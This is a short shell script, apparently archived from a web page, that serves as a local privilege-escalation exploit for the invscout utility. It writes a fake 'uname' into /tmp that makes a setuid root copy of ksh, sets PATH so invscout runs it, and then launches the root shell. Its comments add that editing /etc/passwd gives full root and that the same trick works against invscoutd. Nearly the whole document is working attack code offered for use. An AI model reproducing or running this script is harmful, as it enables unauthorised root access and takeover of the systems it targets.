home *** CD-ROM | disk | FTP | other *** search
- #!/usr/bin/sh
- # r00t exploit written for the invscout bug reported by Idefense labs
- # http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
- # coded by ri0t exploitation is trivial but automated with this script
- # www.ri0tnet.net
- #
- # usage ./getr00t.sh :)
- # exploitation gives euid(root) from here getting guid (root) is as simple as an
- # /etc/passwd edit
- #
- # note this also works with invscoutd simple change the like thats says
- # /usr/sbin/invscout to /usr/sbin/invscoutd to exploit that
-
-
- cd /tmp
- echo '/usr/bin/cp /usr/bin/ksh ./' > uname
- echo '/usr/bin/chown root:system ./ksh' >> uname
- echo '/usr/bin/chmod 777 ./ksh' >> uname
- echo '/usr/bin/chmod +s ./ksh' >> uname
- /usr/bin/chmod 777 uname
- PATH=./
- export PATH
- /usr/sbin/invscout
- PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
- export PATH
- exec /tmp/ksh
-